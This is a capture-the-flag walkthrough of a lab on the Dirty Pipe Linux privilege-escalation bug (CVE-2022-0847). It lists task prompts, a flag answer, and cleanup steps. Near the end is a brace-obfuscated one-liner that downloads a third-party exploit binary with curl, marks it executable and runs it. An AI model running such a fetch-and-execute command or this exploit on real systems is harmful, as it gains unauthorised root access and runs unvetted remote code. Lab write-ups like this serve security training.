Dirty Pipe: CVE-2022-0847

    • Deploy the machine by clicking on the green "Deploy" button at the top of this task!

    No Answer

    • Read the information in the task and understand how Dirty Pipe works.

    No Answer

    • Follow along with the steps described in the task if you haven't already done so.

    First generate the Hash and get the offset :


    Then compile the exploit and launch it to get root access :


    No Answer

    • Switch user (su) into your newly created root account.
      What is the flag found in the /root/flag.txt file


    Answer : THM{MmU4Zjg0NDdjNjFiZWM5ZjUyZGEyMzlm}

    • As mentioned previously, we have accidentally overwritten other user accounts by exploiting Dirty Pipe in this manner. This could cause issues for the server; thus, as professionals, we must clean up after our exploits.
      Using your root shell, restore the original /etc/passwd file from your backup.


    No Answer

    TASK 4 : Practical - Bonus Task A Second Exploit
    • Exploit the target using bl4sty's exploit for Dirty Pipe

    Following the steps :


    No Answer.

    • Make sure to clean up after yourself!
      Remove the SUID binary created by the script (/tmp/sh).

    rm /tmp/sh

    No Answer.

    • [Optional] Find another exploit for this vulnerability online. Review the code to ensure that it does what it claims to do, then upload it to the target and attempt to exploit the vulnerability a third way.

    Using Carlos Sevieira exploit  :

                        {curl,-s,-k,https://raw.githubusercontent.com/carlosevieira/Dirty-Pipe/main/exploit-static,-o,/tmp/exploit-dirty-pipe};{chmod,+x,/tmp/exploit-dirty-pipe};/tmp/exploit-dirty-pipe
                      

    No Answer.

    • I understand the Dirty Pipe vulnerability!

    No Answer.